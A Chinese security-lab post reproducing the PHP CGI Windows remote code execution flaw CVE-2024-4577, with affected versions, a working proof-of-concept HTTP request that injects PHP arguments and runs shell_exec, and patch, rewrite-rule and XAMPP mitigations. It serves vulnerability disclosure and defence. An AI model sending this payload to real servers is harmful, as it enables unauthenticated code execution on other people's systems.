【成功复现】PHP CGI Windows平台远程代码执行漏洞(CVE-2024-4577)

PHP是一款广泛使用的服务器端脚本语言，适用于开发动态网站和Wеb应用程序。未经身份认证的远程攻击者可以通过特定的字符序列绕过此前CVE-2012-1823的防护，通过参数注入攻击在远程PHＰ服务器上执行任意代码，从而导致远程代码执行、敏感信息泄露或造成服务器崩溃。

0x02影响版本

PHP 8.3 < 8.3.8

PHP 8.2 < 8.2.20

PHP 8.1 < 8.1.29

利用条件：

1、用户认证：无需用户认证

2、前置条件：默认配置

3、触发方式：远程

2.对漏洞进行复现

POC

漏洞复现

GET /test.php?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp://input HTTP/1.1Host: 172.17.148.112User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 31




echo shell_exec('dir');?>

测试dir命令执行成功

3.Yakit工具加载nuclei文件测试（漏洞存在）

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.php.net/downloads.php

‍

缓解方案：

1.不方便更新版本的Windows用户，建议暂时关闭php-cgi的使用。

2.以下重写规则可用于阻止攻击。需要注意的是，这些规则仅对繁体中文、简体中文和日语语言环境起到临时缓解作用。在实际操作中，仍然建议更新到补丁版本或迁移架构。

RewriteEngine OnRewriteCond %{QUERY_STRING} ^%ad [NC]RewriteRule .? - [F,L]

3. 对于使用 XAMPP for Windows 的用户：

如果确认不需要 PHP CGI 功能，可以通过修改以下 Apache HTTP Server 配置来避免受到该漏洞的影响：

C:/xampp/apache/conf/extra/httpd-xampp.conf

找到相应的行：

ScriptAlias /php-cgi/ "C:/xampp/php/"

并将其注释掉：

# ScriptAlias /php-cgi/ "C:/xampp/php/"

弥天简介

学海浩茫，予以风动，必降弥天之润！弥天安全实验室成立于2019年2月19日，主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子，也是民间组织。主要以技术共享、交流等不断赋能自己，赋能安全圈，为网络安全发展贡献自己的微薄之力。

口号 网安引领时代，弥天点亮未来